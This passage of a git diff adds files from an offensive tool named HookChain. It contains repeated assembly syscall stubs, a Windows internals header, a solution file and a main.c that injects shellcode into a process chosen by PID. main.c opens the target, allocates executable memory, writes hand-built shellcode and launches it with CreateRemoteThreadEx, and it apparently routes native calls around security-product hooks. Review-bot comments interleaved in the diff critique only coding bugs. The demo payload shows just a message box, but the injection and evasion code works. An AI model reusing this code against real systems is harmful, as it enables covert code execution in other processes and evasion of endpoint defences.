+ Fnc01E3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e3h
+ ret
+ nop
+ Fnc01E3 ENDP
+
+ Fnc01E4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e4h
+ ret
+ nop
+ Fnc01E4 ENDP
+
+ Fnc01E5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e5h
+ ret
+ nop
+ Fnc01E5 ENDP
+
+ Fnc01E6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e6h
+ ret
+ nop
+ Fnc01E6 ENDP
+
+ Fnc01E7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e7h
+ ret
+ nop
+ Fnc01E7 ENDP
+
+ Fnc01E8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e8h
+ ret
+ nop
+ Fnc01E8 ENDP
+
+ Fnc01E9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e9h
+ ret
+ nop
+ Fnc01E9 ENDP
+
+ Fnc01EA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01eah
+ ret
+ nop
+ Fnc01EA ENDP
+
+ Fnc01EB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ebh
+ ret
+ nop
+ Fnc01EB ENDP
+
+ Fnc01EC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ech
+ ret
+ nop
+ Fnc01EC ENDP
+
+ Fnc01ED PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01edh
+ ret
+ nop
+ Fnc01ED ENDP
+
+ Fnc01EE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01eeh
+ ret
+ nop
+ Fnc01EE ENDP
+
+ Fnc01EF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01efh
+ ret
+ nop
+ Fnc01EF ENDP
+
+ Fnc01F0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f0h
+ ret
+ nop
+ Fnc01F0 ENDP
+
+ Fnc01F1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f1h
+ ret
+ nop
+ Fnc01F1 ENDP
+
+ Fnc01F2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f2h
+ ret
+ nop
+ Fnc01F2 ENDP
+
+ Fnc01F3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f3h
+ ret
+ nop
+ Fnc01F3 ENDP
+
+ Fnc01F4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f4h
+ ret
+ nop
+ Fnc01F4 ENDP
+
+ Fnc01F5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f5h
+ ret
+ nop
+ Fnc01F5 ENDP
+
+ Fnc01F6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f6h
+ ret
+ nop
+ Fnc01F6 ENDP
+
+ Fnc01F7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f7h
+ ret
+ nop
+ Fnc01F7 ENDP
+
+ Fnc01F8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f8h
+ ret
+ nop
+ Fnc01F8 ENDP
+
+ Fnc01F9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f9h
+ ret
+ nop
+ Fnc01F9 ENDP
+
+ Fnc01FA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fah
+ ret
+ nop
+ Fnc01FA ENDP
+
+ Fnc01FB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fbh
+ ret
+ nop
+ Fnc01FB ENDP
+
+ Fnc01FC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fch
+ ret
+ nop
+ Fnc01FC ENDP
+
+ Fnc01FD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fdh
+ ret
+ nop
+ Fnc01FD ENDP
+
+ Fnc01FE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01feh
+ ret
+ nop
+ Fnc01FE ENDP
+
+ Fnc01FF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ffh
+ ret
+ nop
+ Fnc01FF ENDP
+
+
+end
diff --git a/HookChain/HookChain/main.c b/HookChain/HookChain/main.c
new file mode 100644
index 0000000..f7d20c0
--- /dev/null
+++ b/HookChain/HookChain/main.c
@@ -0,0 +1,172 @@
+#pragma once
+
+#include
+#include
+
+#include "hook.h"
+
+INT wmain(int argc, char* argv[])
+{
+ NTSTATUS status;
+ PVOID shellAddress = NULL;
+ HANDLE hProcess = (HANDLE)-1;
+ DWORD dwPID = 0;
+
+ if (argc >= 2)
+ {
+ dwPID = _wtoi(argv[1]);
+ if (dwPID == 0)
+ dwPID = atoi(argv[1]);
+ }
+
+ if (dwPID == 0) {
+ char cPid[7];
+
+ printf("Type the pid: \n");
+ fgets(cPid, sizeof(cPid), stdin);
+ dwPID = _wtoi(cPid);
+ if (dwPID == 0)
+ dwPID = atoi(cPid);
+ }
+
+ if (dwPID == 0) {
+ printf("[!] Failed to get PID\n");
+ return 1;
+ }
+
+ printf("\n[+] Creating HookChain implants\n");
+ if (!InitApi()) {
+ printf("[!] Failed to initialize API\n");
+ return 1;
+ }
+
+ printf("\n[+] HookChain implanted! \\o/\n\n");
+
+
+ printf("[*] Creating Handle onto PID %d\n", dwPID);
+
+ POBJECT_ATTRIBUTES objectAttributes = (POBJECT_ATTRIBUTES)RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(OBJECT_ATTRIBUTES));
+ PCLIENT_ID clientId = (PCLIENT_ID)RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CLIENT_ID));
+ clientId->UniqueProcess = dwPID;
+ if (!NT_SUCCESS(NtOpenProcess(&hProcess, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, objectAttributes, clientId))) {
+ printf("[!] Failed to call OP: Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+
+ printf("[*] Allocating memory at Handle 0x%p\n", hProcess);
+
+ SIZE_T memSize = 0x1000;
+ if (!NT_SUCCESS(NtAllocateVirtualMemory(hProcess, &shellAddress, 0, &memSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ))) {
+ printf("[!] Failed to call VA(shellAddress): Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+
+ printf("[*] Injecting remote shellcode\n");
+
+ //Write Caption and Text to memory address of remote process
+ TCHAR Text[] = TEXT("Message Box created from HookChain");
+ TCHAR Caption[] = TEXT("Process injected MessageBox");
+
+ FARPROC fpText = (FARPROC)((PBYTE)shellAddress + 0x100);
+ FARPROC fpCaption = (FARPROC)((PBYTE)shellAddress + 0x200);
+ PVOID pText = &fpText;
+ PVOID pCaption = &fpCaption;
+
+ if (!WriteProcessMemory(hProcess, fpText, (LPCVOID)Text, sizeof(Text), NULL)) {
+ printf("[!] Failed to call WPM(Text): Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+
+ if (!WriteProcessMemory(hProcess, fpCaption, (LPCVOID)Caption, sizeof(Caption), NULL)) {
+ printf("[!] Failed to call WPM(Caption): Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+
+#ifdef UNICODE
+ PVOID pfMessageBox = HGetProcAddress2("User32", "MessageBoxW");
+ PVOID pMessageBox = &pfMessageBox;
+#else
+ FARPROC pfMessageBox = HGetProcAddress2("User32", "MessageBoxA");
+ PVOID pMessageBox = &pfMessageBox;
+#endif
+
+ PVOID fpTerminateThread = HGetProcAddress2("Kernel32", "TerminateThread");
+ PVOID pTerminateThread = &fpTerminateThread;
+
+ /*
+ int MessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType);
+
+ uType:
+ MB_OK = 0x00000000L
+ MB_ICONWARNING = 0x00000030L
+ MB_TOPMOST = 0x00040000L
+ MB_SETFOREGROUND = 0x00010000L
+
+ BOOL TerminateThread(HANDLE hThread, DWORD dwExitCode);
+
+ */
+
+ unsigned char p1[] = {
+ //0xcc,
+ 0x55 // push rbp
+ , 0x48, 0x89, 0xe5 // mov rbp,rsp
+
+ , 0xfc // cld
+ , 0x48, 0x83, 0xe4, 0xf0 // and rsp, 0xfffffffffffffff0
+
+ , 0x48, 0x31, 0xc0 // xor rax,rax
+ , 0x48, 0x89, 0xc1 // mov rcx,rax
+
+ , 0x48, 0xba,*((PBYTE)pText),*((PBYTE)pText + 1),*((PBYTE)pText + 2),*((PBYTE)pText + 3),*((PBYTE)pText + 4),*((PBYTE)pText + 5),*((PBYTE)pText + 6),*((PBYTE)pText + 7) // mov rdx, ...
+ , 0x49, 0xb8,*((PBYTE)pCaption),*((PBYTE)pCaption + 1),*((PBYTE)pCaption + 2),*((PBYTE)pCaption + 3),*((PBYTE)pCaption + 4),*((PBYTE)pCaption + 5),*((PBYTE)pCaption + 6),*((PBYTE)pCaption + 7) // mov r8, ...
+ , 0x41, 0xb9, 0x30, 0x00, 0x05, 0x00 // mov r9,0x30 => MB_OK | MB_ICONWARNING | MB_TOPMOST | MB_SETFOREGROUND
+
+ , 0x48, 0x83, 0xec, 0x20 // sub rsp,0x20
+ , 0x48, 0x89, 0x04, 0x24 // mov QWORD PTR [rsp],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x08 // mov QWORD PTR [rsp+0x8],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x10 // mov QWORD PTR [rsp+0x10],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x18 // mov QWORD PTR [rsp+0x18],rax
+
+ , 0x48, 0xb8,*((PBYTE)pMessageBox),*((PBYTE)pMessageBox + 1),*((PBYTE)pMessageBox + 2),*((PBYTE)pMessageBox + 3),*((PBYTE)pMessageBox + 4),*((PBYTE)pMessageBox + 5),*((PBYTE)pMessageBox + 6),*((PBYTE)pMessageBox + 7) // mov rax ...
+ , 0xff, 0xd0 // call rax
+
+ , 0x48, 0x31, 0xc0 // xor rax,rax
+
+ , 0x48, 0x89, 0xc1 // mov rcx,rax
+ , 0x48, 0xff, 0xc9 // dec rcx
+ , 0x48, 0x89, 0xc2 // mov rdx,rax
+ , 0x48, 0x83, 0xec, 0x20 // sub rsp,0x20
+ , 0x48, 0x89, 0x04, 0x24 // mov QWORD PTR [rsp],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x08 // mov QWORD PTR [rsp+0x8],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x10 // mov QWORD PTR [rsp+0x10],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x18 // mov QWORD PTR [rsp+0x18],rax
+
+ , 0x48, 0xb8,*((PBYTE)pTerminateThread),*((PBYTE)pTerminateThread + 1),*((PBYTE)pTerminateThread + 2),*((PBYTE)pTerminateThread + 3),*((PBYTE)pTerminateThread + 4),*((PBYTE)pTerminateThread + 5),*((PBYTE)pTerminateThread + 6),*((PBYTE)pTerminateThread + 7) // mov rax ...
+ , 0xff, 0xd0 // call rax
+
+ , 0x48, 0x89, 0xec // mov rsp,rbp
+ , 0x5d // pop rbp
+ , 0xc3 // ret
+
+ , 0xcc, 0xcc, 0xcc // INT3
+ };
+
+ if (!WriteProcessMemory(hProcess, shellAddress, (LPCVOID)p1, sizeof(p1), NULL)) {
+ printf("[!] Failed to call WriteProcessMemory(Shellcode): Status = 0x%08lx\n", GetLastError());
+ }
+
+ printf("[*] Calling CreateRemoteThreadEx\n");
+ HANDLE hThread = CreateRemoteThreadEx(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)shellAddress, NULL, NULL, NULL, NULL);
+ if (hThread == NULL) {
+ printf("[!] Failed to call CRT: Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+
+ //Disable Hook prints
+ SetDebug(FALSE);
+
+ printf("[+] Shellcode OK!\n");
+ printf("\n\n _ _ _____ _____ _ _ _______ _ _ _______ _____ __ _\n |_____| | | | | |____/ | |_____| |_____| | | \\ |\n | | |_____| |_____| | \\_ |_____ | | | | __|__ | \\_|\n By M4v3r1ck\n\n");
+ return 0x00;
+
+}
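Review bot: `wmain` is declared with `char* argv[]` (L6780) but `_wtoi(argv[1])` on L6789 and `_wtoi(cPid)` on L6799 treat narrow buffers as wide strings, so the wide parse reads every other byte and the code only works because of the `atoi` fallback; declare the entry point as `INT wmain(int argc, wchar_t* argv[])` and parse with `_wtoi` only, or keep narrow `main`/`argv` and drop the `_wtoi` calls. The `NTSTATUS status` declared on L6782 is never assigned, and the failure paths on L6824 and L6832 print `GetLastError()` after native `Nt*` calls that do not set the Win32 last-error value, so the logged code is stale; capture `status = NtOpenProcess(...)` and print `status` in the `0x%08lx` format instead. The `#include` lines on L6775–L6776 appear to have lost their header names, presumably a rendering artefact rather than the committed text, but worth confirming. Neither `hProcess`, `hThread` nor the two `RtlAllocateHeapStub` allocations are released before the function returns.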
diff --git a/HookChain/HookChain/windows_common.h b/HookChain/HookChain/windows_common.h
new file mode 100644
index 0000000..da37ff7
--- /dev/null
+++ b/HookChain/HookChain/windows_common.h
@@ -0,0 +1,393 @@
+//===============================================================================================//
+#ifndef _OKCHAIN_WINDOWS_COMMON_H
+#define _OKCHAIN_WINDOWS_COMMON_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include
+#include
+
+#if defined _M_X64
+#define WIN_X64
+#elif defined _M_IX86
+#define WIN_X86
+#endif
+
+#define DLL_QUERY_HMODULE 6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+#define DLLEXPORT __declspec( dllexport )
+
+#define NT_SUCCESS(x) ((x) == 0)
+#define RVA2OFFSET(Type, DllBase, CpBase, CpVa, Rva) (Type)((ULONG_PTR)CpBase + (((ULONG_PTR)DllBase + Rva) - (ULONG_PTR)CpVa))
+#define OFFSET2RVA(DllBase, CpBase, CpVa, OffsetVa) (DWORD)( (DWORD_PTR)CpVa + ((DWORD_PTR)OffsetVa - (DWORD_PTR)CpBase) - (DWORD_PTR)DllBase )
+#define RVA2RAW(Type, DllBase, SectionRva, SectionPointerToRawData, Rva) (Type)((ULONG_PTR)DllBase + ((ULONG_PTR)Rva - (ULONG_PTR)SectionRva) + (ULONG_PTR)SectionPointerToRawData)
+
+typedef struct _LSA_UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ PWSTR Buffer;
+} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
+
+typedef struct _LDR_MODULE {
+ LIST_ENTRY InLoadOrderModuleList;
+ LIST_ENTRY InMemoryOrderModuleList;
+ LIST_ENTRY InInitializationOrderModuleList;
+ PVOID BaseAddress;
+ PVOID EntryPoint;
+ ULONG SizeOfImage;
+ UNICODE_STRING FullDllName;
+ UNICODE_STRING BaseDllName;
+ ULONG Flags;
+ SHORT LoadCount;
+ SHORT TlsIndex;
+ LIST_ENTRY HashTableEntry;
+ ULONG TimeDateStamp;
+} LDR_MODULE, * PLDR_MODULE;
+
+typedef struct _PEB_LDR_DATA {
+ ULONG Length;
+ ULONG Initialized;
+ PVOID SsHandle;
+ LIST_ENTRY InLoadOrderModuleList;
+ LIST_ENTRY InMemoryOrderModuleList;
+ LIST_ENTRY InInitializationOrderModuleList;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+typedef struct _PEB {
+ BOOLEAN InheritedAddressSpace;
+ BOOLEAN ReadImageFileExecOptions;
+ BOOLEAN BeingDebugged;
+ BOOLEAN Spare;
+ HANDLE Mutant;
+ PVOID ImageBase;
+ PPEB_LDR_DATA LoaderData;
+ PVOID ProcessParameters;
+ PVOID SubSystemData;
+ PVOID ProcessHeap;
+ PVOID FastPebLock;
+ PVOID FastPebLockRoutine;
+ PVOID FastPebUnlockRoutine;
+ ULONG EnvironmentUpdateCount;
+ PVOID* KernelCallbackTable;
+ PVOID EventLogSection;
+ PVOID EventLog;
+ PVOID FreeList;
+ ULONG TlsExpansionCounter;
+ PVOID TlsBitmap;
+ ULONG TlsBitmapBits[0x2];
+ PVOID ReadOnlySharedMemoryBase;
+ PVOID ReadOnlySharedMemoryHeap;
+ PVOID* ReadOnlyStaticServerData;
+ PVOID AnsiCodePageData;
+ PVOID OemCodePageData;
+ PVOID UnicodeCaseTableData;
+ ULONG NumberOfProcessors;
+ ULONG NtGlobalFlag;
+ BYTE Spare2[0x4];
+ LARGE_INTEGER CriticalSectionTimeout;
+ ULONG HeapSegmentReserve;
+ ULONG HeapSegmentCommit;
+ ULONG HeapDeCommitTotalFreeThreshold;
+ ULONG HeapDeCommitFreeBlockThreshold;
+ ULONG NumberOfHeaps;
+ ULONG MaximumNumberOfHeaps;
+ PVOID** ProcessHeaps;
+ PVOID GdiSharedHandleTable;
+ PVOID ProcessStarterHelper;
+ PVOID GdiDCAttributeList;
+ PVOID LoaderLock;
+ ULONG OSMajorVersion;
+ ULONG OSMinorVersion;
+ ULONG OSBuildNumber;
+ ULONG OSPlatformId;
+ ULONG ImageSubSystem;
+ ULONG ImageSubSystemMajorVersion;
+ ULONG ImageSubSystemMinorVersion;
+ ULONG GdiHandleBuffer[0x22];
+ ULONG PostProcessInitRoutine;
+ ULONG TlsExpansionBitmap;
+ BYTE TlsExpansionBitmapBits[0x80];
+ ULONG SessionId;
+} PEB, * PPEB;
+
+typedef struct __CLIENT_ID {
+ HANDLE UniqueProcess;
+ HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+ ULONG Flags;
+ PCHAR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME {
+ ULONG Flags;
+ struct _TEB_ACTIVE_FRAME* Previous;
+ PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
+
+typedef struct _GDI_TEB_BATCH {
+ ULONG Offset;
+ ULONG HDC;
+ ULONG Buffer[310];
+} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
+
+typedef PVOID PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+ struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+ PACTIVATION_CONTEXT ActivationContext;
+ ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+ PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+ LIST_ENTRY FrameListCache;
+ ULONG Flags;
+ ULONG NextCookieSequenceNumber;
+ ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
+typedef struct _TEB {
+ NT_TIB NtTib;
+ PVOID EnvironmentPointer;
+ CLIENT_ID ClientId;
+ PVOID ActiveRpcHandle;
+ PVOID ThreadLocalStoragePointer;
+ PPEB ProcessEnvironmentBlock;
+ ULONG LastErrorValue;
+ ULONG CountOfOwnedCriticalSections;
+ PVOID CsrClientThread;
+ PVOID Win32ThreadInfo;
+ ULONG User32Reserved[26];
+ ULONG UserReserved[5];
+ PVOID WOW32Reserved;
+ LCID CurrentLocale;
+ ULONG FpSoftwareStatusRegister;
+ PVOID SystemReserved1[54];
+ LONG ExceptionCode;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+ UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+ ULONG TxFsContext;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+ UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+#else
+ ACTIVATION_CONTEXT_STACK ActivationContextStack;
+ UCHAR SpareBytes1[24];
+#endif
+ GDI_TEB_BATCH GdiTebBatch;
+ CLIENT_ID RealClientId;
+ PVOID GdiCachedProcessHandle;
+ ULONG GdiClientPID;
+ ULONG GdiClientTID;
+ PVOID GdiThreadLocalInfo;
+ PSIZE_T Win32ClientInfo[62];
+ PVOID glDispatchTable[233];
+ PSIZE_T glReserved1[29];
+ PVOID glReserved2;
+ PVOID glSectionInfo;
+ PVOID glSection;
+ PVOID glTable;
+ PVOID glCurrentRC;
+ PVOID glContext;
+ NTSTATUS LastStatusValue;
+ UNICODE_STRING StaticUnicodeString;
+ WCHAR StaticUnicodeBuffer[261];
+ PVOID DeallocationStack;
+ PVOID TlsSlots[64];
+ LIST_ENTRY TlsLinks;
+ PVOID Vdm;
+ PVOID ReservedForNtRpc;
+ PVOID DbgSsReserved[2];
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ ULONG HardErrorMode;
+#else
+ ULONG HardErrorsAreDisabled;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+ GUID ActivityId;
+ PVOID SubProcessTag;
+ PVOID EtwLocalData;
+ PVOID EtwTraceData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ PVOID Instrumentation[14];
+ PVOID SubProcessTag;
+ PVOID EtwLocalData;
+#else
+ PVOID Instrumentation[16];
+#endif
+ PVOID WinSockData;
+ ULONG GdiBatchCount;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ BOOLEAN SpareBool0;
+ BOOLEAN SpareBool1;
+ BOOLEAN SpareBool2;
+#else
+ BOOLEAN InDbgPrint;
+ BOOLEAN FreeStackOnTermination;
+ BOOLEAN HasFiberData;
+#endif
+ UCHAR IdealProcessor;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ ULONG GuaranteedStackBytes;
+#else
+ ULONG Spare3;
+#endif
+ PVOID ReservedForPerf;
+ PVOID ReservedForOle;
+ ULONG WaitingOnLoaderLock;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PVOID SavedPriorityState;
+ ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR ThreadPoolData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ ULONG_PTR SparePointer1;
+ ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR SoftPatchPtr2;
+#else
+ Wx86ThreadState Wx86Thread;
+#endif
+ PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+ PVOID DeallocationBStore;
+ PVOID BStoreLimit;
+#endif
+ ULONG ImpersonationLocale;
+ ULONG IsImpersonating;
+ PVOID NlsCache;
+ PVOID pShimData;
+ ULONG HeapVirtualAffinity;
+ HANDLE CurrentTransactionHandle;
+ PTEB_ACTIVE_FRAME ActiveFrame;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ PVOID FlsData;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+ PVOID PreferredLangauges;
+ PVOID UserPrefLanguages;
+ PVOID MergedPrefLanguages;
+ ULONG MuiImpersonation;
+ union
+ {
+ struct
+ {
+ USHORT SpareCrossTebFlags : 16;
+ };
+ USHORT CrossTebFlags;
+ };
+ union
+ {
+ struct
+ {
+ USHORT DbgSafeThunkCall : 1;
+ USHORT DbgInDebugPrint : 1;
+ USHORT DbgHasFiberData : 1;
+ USHORT DbgSkipThreadAttach : 1;
+ USHORT DbgWerInShipAssertCode : 1;
+ USHORT DbgIssuedInitialBp : 1;
+ USHORT DbgClonedThread : 1;
+ USHORT SpareSameTebBits : 9;
+ };
+ USHORT SameTebFlags;
+ };
+ PVOID TxnScopeEntercallback;
+ PVOID TxnScopeExitCAllback;
+ PVOID TxnScopeContext;
+ ULONG LockCount;
+ ULONG ProcessRundown;
+ ULONG64 LastSwitchTime;
+ ULONG64 TotalSwitchOutTime;
+ LARGE_INTEGER WaitReasonBitMap;
+#else
+ BOOLEAN SafeThunkCall;
+ BOOLEAN BooleanSpare[3];
+#endif
+} TEB, * PTEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+ LIST_ENTRY InLoadOrderLinks;
+ LIST_ENTRY InMemoryOrderLinks;
+ LIST_ENTRY InInitializationOrderLinks;
+ PVOID DllBase;
+ PVOID EntryPoint;
+ ULONG SizeOfImage;
+ UNICODE_STRING FullDllName;
+ UNICODE_STRING BaseDllName;
+ ULONG Flags;
+ WORD LoadCount;
+ WORD TlsIndex;
+ union {
+ LIST_ENTRY HashLinks;
+ struct {
+ PVOID SectionPointer;
+ ULONG CheckSum;
+ };
+ };
+ union {
+ ULONG TimeDateStamp;
+ PVOID LoadedImports;
+ };
+ PACTIVATION_CONTEXT EntryPointActivationContext;
+ PVOID PatchInformation;
+ LIST_ENTRY ForwarderLinks;
+ LIST_ENTRY ServiceTagLinks;
+ LIST_ENTRY StaticLinks;
+} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ PVOID RootDirectory;
+ PUNICODE_STRING ObjectName;
+ ULONG Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _INITIAL_TEB {
+ PVOID StackBase;
+ PVOID StackLimit;
+ PVOID StackCommit;
+ PVOID StackCommitMax;
+ PVOID StackReserved;
+} INITIAL_TEB, * PINITIAL_TEB;
+
+/*
+#ifndef _QUEUE_USER_APC_FLAGS
+typedef enum _QUEUE_USER_APC_FLAGS {
+ QueueUserApcFlagsNone,
+ QueueUserApcFlagsSpecialUserApc,
+ QueueUserApcFlagsMaxValue
+} QUEUE_USER_APC_FLAGS;
+#endif
+*/
+
+#ifndef _USER_APC_OPTION
+typedef union _USER_APC_OPTION {
+ ULONG_PTR UserApcFlags;
+ HANDLE MemoryReserveHandle;
+} USER_APC_OPTION, * PUSER_APC_OPTION;
+#endif
+
+#ifndef _MEMORY_RESERVE_OBJECT_TYPE
+typedef enum _MEMORY_RESERVE_OBJECT_TYPE {
+ MemoryReserveObjectTypeUserApc,
+ MemoryReserveObjectTypeIoCompletion
+} MEMORY_RESERVE_OBJECT_TYPE, PMEMORY_RESERVE_OBJECT_TYPE;
+#endif
+
+typedef DWORD MEMORY_INFORMATION_CLASS;
+
+#define MemoryBasicInformation ((MEMORY_INFORMATION_CLASS)0)
+#define MemoryPrivilegedBasicInformation ((MEMORY_INFORMATION_CLASS)8)
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
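Review bot: `NT_SUCCESS` at the `#define NT_SUCCESS(x) ((x) == 0)` line treats every non-zero NTSTATUS as a failure, whereas the SDK definition is `((NTSTATUS)(x) >= 0)`, so informational and warning statuses such as STATUS_PENDING would be reported as errors by any caller that tests a native-API result through this macro; I would change it to `#define NT_SUCCESS(x) (((NTSTATUS)(x)) >= 0)`. Two declarations also look like typos: `struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous` names a tag with two leading underscores, so it points to an unrelated incomplete type rather than to `_RTL_ACTIVATION_CONTEXT_STACK_FRAME`, and `PMEMORY_RESERVE_OBJECT_TYPE` in the enum typedef is missing the `*` and is therefore an alias for the enum, not a pointer to it. The two bare `#include` lines near the top carry no header name, which may be an artifact of how the patch was rendered rather than of the file itself, but is worth confirming since nothing else in the header declares the Windows types it relies on.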
diff --git a/HookChain/HookChain_msg.sln b/HookChain/HookChain_msg.sln
new file mode 100644
index 0000000..94aeaeb
--- /dev/null
+++ b/HookChain/HookChain_msg.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.8.34330.188
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HookChain", "HookChain\HookChain.vcxproj", "{B0C08C11-23C4-495F-B40B-14066F12FAAB}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x64.ActiveCfg = Debug|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x64.Build.0 = Debug|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x86.ActiveCfg = Debug|Win32
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x86.Build.0 = Debug|Win32
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x64.ActiveCfg = Release|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x64.Build.0 = Release|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x86.ActiveCfg = Release|Win32
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {882B21F7-7E2B-4712-AAD3-964F097E0F07}
+ EndGlobalSection
+EndGlobal
diff --git a/enum/hookchain_finder64.7z b/enum/hookchain_finder64.7z
new file mode 100644
index 0000000..191603c
Binary files /dev/null and b/enum/hookchain_finder64.7z differ
